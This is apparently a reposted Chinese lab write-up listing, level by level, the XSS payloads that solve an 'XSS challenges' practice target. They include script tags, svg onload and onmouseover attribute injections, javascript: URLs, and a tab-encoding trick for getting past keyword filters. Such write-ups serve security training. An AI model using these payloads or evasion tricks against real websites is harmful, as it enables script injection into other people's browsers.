XSS challenges靶机

第一关

<script>alert(123)</script>

"><svg onload=alert(123)>

第二关

<script>alert(123);</script>

"><script>alert(123);</script>

或者

"><svg onload=alert(123)>

第三关

;javascript:alert(document.domain);//

<script>alert(123);</script>

第四关

<script>alert(123);</script>

<script>alert(123);</script>

"><script>alert(123);</script>

"><svg onload=alert(123)>;

第五关

"><script>alert(123)</script>

第六关

<>符号被HTML 特殊字符代替  

" οnclick="alert(123)" 

" onmouseover=alert(123)%0a

第七关

"><script>alert(123)</script>

" onmouseover=alert(123)

" οnclick="alert(123)" 

第八关

javascript:alert(123)

第九关

失败

第10关

"><svg onload=alert(123)>"> 

" onmouseover=alert(123); x="

"><script>alert(123);</script><"

第十一关

script会被替换为xscript 

on事件会被替换为onxxx

style会被替换为stxxx

"><a href="javascript:alert(123);">123</a><"

将script中的某个字符转为unicode编码,或者可以插入&#09;,&#10;,空格等不可见字符对script进行分割,让正则匹配不到

"><a href="javascri%09pt:alert(123);">123</a><" 

第十二关

发现过滤了<>"

``onmouseover=alert(123);

无ie浏览器

原文地址:https://www.cnblogs.com/bingtang123/p/13298840.html